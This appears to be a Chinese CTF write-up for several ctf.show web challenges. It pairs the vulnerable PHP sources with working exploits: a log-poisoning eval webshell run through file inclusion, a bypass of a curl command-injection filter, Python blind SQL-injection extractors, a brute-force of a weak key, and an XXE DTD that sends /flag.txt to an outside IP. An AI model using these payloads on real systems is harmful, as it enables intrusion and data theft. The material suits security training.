签到_观己
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| <?php
if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ die('error'); }else{ include($file); }
}else{ highlight_file(__FILE__); }
?>
|
包含日志文件即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| POST /?file=/var/log/nginx/access.log HTTP/1.1 Host: c2ddfbf5-dccb-4ff8-935f-7f6f592a35ce.challenge.ctf.show Cookie: cf_clearance=AlLJBGTvGfSx92Z2TE133nsC62L7ZvjHOaMdV6S5Ifc-1734007807-1.2.1.1-ed02RSpjUZJ.8wpVSw_bIQz63q.QPpBfjaeLr9UFebRdQn5K_pmp5RsNDNplRaoZ_7JJ2AC3WmVqUy__CtJPVKRmVhqj4cJ68UVKAUpxeeGs0aWMg49qQzPlywdx7ds.aX9a0osPl_qYm8smseceZmGH21Hiv4lMUmEN8elAGnKbYBXsRTvTc.ojeUDWAFXqq3.zWrK.keENkxpeYJOyvuSYm5mtdIX7ZmaYnVnH8WgesxHgiDfjdD88DrdCPxjmE26q6UYRfoPynd1HbNlMjlQ94qWtLp5zIvRKo8ZJd3y9Fv7j9fa4HHZPB90CrOyllJwZGzWb0DfSSSvIRAkSDQXgkHoIjIA.KQpfAWgYRdSUMLXN9mIrjR0zFOCaEKuD Content-Length: 38 Pragma: no-cache Cache-Control: no-cache Sec-Ch-Ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Origin: https://c2ddfbf5-dccb-4ff8-935f-7f6f592a35ce.challenge.ctf.show Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36;<?php eval($_POST[1]);?> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://c2ddfbf5-dccb-4ff8-935f-7f6f592a35ce.challenge.ctf.show/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Priority: u=0, i Connection: close
1=system%28%22tac+%2Fflag.txt%22%29%3B
|
web1_观字
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| <?php
if(isset($_GET['url'])){ $url = $_GET['url']; $protocol = substr($url, 0,7); if($protocol!='http://'){ die('仅限http协议访问'); } if(preg_match('/\.|\;|\||\<|\>|\*|\%|\^|\(|\)|\#|\@|\!|\`|\~|\+|\'|\"|\.|\,|\?|\[|\]|\{|\}|\!|\&|\$|0/', $url)){ die('仅限域名地址访问'); } system('curl '.$url); }
|
直接句号绕过就可以了
1
| https://4ab842e8-5588-4bee-a574-e01f963ef429.challenge.ctf.show/?url=http://192。168。7。68/flag
|
web2_观星
发现没啥东西,当时这个id有点可疑,先扫一下吧
1 2
| [08:12:48] 200 - 407B - /eam/vib?id=/etc/issue [08:12:53] 200 - 407B - /gotoURL.asp?url=google.com&id=43569
|
这两个就是文章列表没啥用啊,idFUZZ一下,这里有三篇文章有个特性就是,总共三篇文章我们尝试注入如果,是不同的文章的以此来盲注
1 2 3 4
| id=2^0 A Child's Dream of a Star id=2^1 I asked nothing
|
然后这里我们来注入即可,FUZZ出来黑名单,过滤的还是挺多的
1 2 3
| ord代替ascii ,用from for 绕过 =用regexp
|
1
| 2^case(ord(substr(database()from(1)for(1))))when(117)then(1)else(0)end
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| import requests url="http://2d57ffbf-cf4a-4166-b745-a1b0556dc371.node5.buuoj.cn:81/index.php"
target="" i=0 while True: head = 127 tail = 32 i+=1 while tail<head: mid=(head+tail)//2 payload=f"2^case(ord(substr(database()from({i})for(1))))when({mid})then(1)else(0)end" r=requests.get(url=url,params={"id":payload}) if "I asked nothing" in r.text: tail=mid+1 else: head=mid if tail!=32: target+=chr(tail) print(chr(tail)) else: break print(f"\r{target}", end='')
|
类似的写了一个二分法,但是后面仔细想想发现这个东西只能遍历,因为使用了case when
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
| import sys
import requests url="http://a8a737ca-7a82-43bc-80e3-ab397f575124.challenge.ctf.show/index.php?id="
target="" for i in range(1,50): found =False for j in range(32,127): payload = f"2^case(ord(substr((select(flag)from(flag))from({i})for(1))))when({j})then(1)else(0)end"
payload=url+payload r=requests.get(url=payload) if "I asked nothing" in r.text: found=True target+=chr(j) print(chr(j)) print(f"\r{target}", end='') break if not found: sys.exit() print(target)
|
就是很慢,而且我也不好加多线程,于是就是慢慢等了,并且延时了容器
web3_观图
查看源码拿到路由,先读文件,我就直接猜是base64编码了,诶好像不对,那把路径拿掉看看能不能有,发现可以
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| <?php
include('config.php'); if(isset($_GET['image'])){ $image=$_GET['image']; $str = openssl_decrypt($image, 'bf-ecb', $key); if(file_exists($str)){ header('content-type:image/gif'); echo file_get_contents($str); } }else{ highlight_file(__FILE__); } ?>
|
有个解密函数,是PHP内置的用来解决OpenSSL算法的,但是这里使用rand()函数来生成随机数,但是任意数最大才为32768,key是可以被爆破的,写个exp
1 2 3 4 5 6 7 8 9 10
| <?php for($i=0;$i<32768;$i++){ $key=substr(md5('ctfshow'.$i),3,8); $image="Z6Ilu83MIDw="; $str = openssl_decrypt($image, 'bf-ecb', $key); if(strpos($str,"gif") or strpos($str,"jpg") or strpos($str,"png")){ print $i; break; } }
|
那么加密拿到文件
1 2 3 4 5 6
| <?php $key = substr(md5('ctfshow'.'27347'),3,8);
$image="config.php"; $str = openssl_encrypt($image, 'bf-ecb', $key); echo $str;
|
web4_观心
这个占卜好像是个恒真的式子?我测了两次都是对的,源码里面提示了flag在/flag.txt,所以应该是有地方能进行文件读取的,不然扫F12看看有没有什么东西,还是没看到啥,占卜的时候抓包得到了东西
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
| POST /api.php HTTP/1.1 Host: 7521abe5-d24f-40f0-9ab3-502de131ce54.challenge.ctf.show Cookie: cf_clearance=AlLJBGTvGfSx92Z2TE133nsC62L7ZvjHOaMdV6S5Ifc-1734007807-1.2.1.1-ed02RSpjUZJ.8wpVSw_bIQz63q.QPpBfjaeLr9UFebRdQn5K_pmp5RsNDNplRaoZ_7JJ2AC3WmVqUy__CtJPVKRmVhqj4cJ68UVKAUpxeeGs0aWMg49qQzPlywdx7ds.aX9a0osPl_qYm8smseceZmGH21Hiv4lMUmEN8elAGnKbYBXsRTvTc.ojeUDWAFXqq3.zWrK.keENkxpeYJOyvuSYm5mtdIX7ZmaYnVnH8WgesxHgiDfjdD88DrdCPxjmE26q6UYRfoPynd1HbNlMjlQ94qWtLp5zIvRKo8ZJd3y9Fv7j9fa4HHZPB90CrOyllJwZGzWb0DfSSSvIRAkSDQXgkHoIjIA.KQpfAWgYRdSUMLXN9mIrjR0zFOCaEKuD Content-Length: 68 Sec-Ch-Ua-Platform: "Windows" X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: application/json, text/javascript, */*; q=0.01 Sec-Ch-Ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-Ch-Ua-Mobile: ?0 Origin: https://7521abe5-d24f-40f0-9ab3-502de131ce54.challenge.ctf.show Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://7521abe5-d24f-40f0-9ab3-502de131ce54.challenge.ctf.show/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Priority: u=0, i Connection: close
api=http%3A%2F%2Fflash.weather.com.cn%2Fwmaps%2Fxml%2Fcity.xml&city=
|
这个文档不能curl,貌似类似一个图床?,但是可以确定的是会加载我们的xml文档直接打就可以了
1 2 3 4
| <!ENTITY % file SYSTEM "file:///flag.txt"> <!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://156.238.233.9:9999/?x=%file;'>"> %eval; %exfiltrate;
|
1 2 3
| <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://156.238.233.9/b.dtd">%xxe;]> <foo></foo>
|
然后好像也不用监听报错看到他是使用的loadXML()函数,所以页面就有flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
| POST /api.php HTTP/1.1 Host: 7521abe5-d24f-40f0-9ab3-502de131ce54.challenge.ctf.show Cookie: cf_clearance=AlLJBGTvGfSx92Z2TE133nsC62L7ZvjHOaMdV6S5Ifc-1734007807-1.2.1.1-ed02RSpjUZJ.8wpVSw_bIQz63q.QPpBfjaeLr9UFebRdQn5K_pmp5RsNDNplRaoZ_7JJ2AC3WmVqUy__CtJPVKRmVhqj4cJ68UVKAUpxeeGs0aWMg49qQzPlywdx7ds.aX9a0osPl_qYm8smseceZmGH21Hiv4lMUmEN8elAGnKbYBXsRTvTc.ojeUDWAFXqq3.zWrK.keENkxpeYJOyvuSYm5mtdIX7ZmaYnVnH8WgesxHgiDfjdD88DrdCPxjmE26q6UYRfoPynd1HbNlMjlQ94qWtLp5zIvRKo8ZJd3y9Fv7j9fa4HHZPB90CrOyllJwZGzWb0DfSSSvIRAkSDQXgkHoIjIA.KQpfAWgYRdSUMLXN9mIrjR0zFOCaEKuD Content-Length: 45 Pragma: no-cache Cache-Control: no-cache Sec-Ch-Ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Origin: https://7521abe5-d24f-40f0-9ab3-502de131ce54.challenge.ctf.show Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://7521abe5-d24f-40f0-9ab3-502de131ce54.challenge.ctf.show/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Priority: u=0, i Connection: close
api=http%3A%2F%2F156.238.233.9%2Fb.xml&city=1
|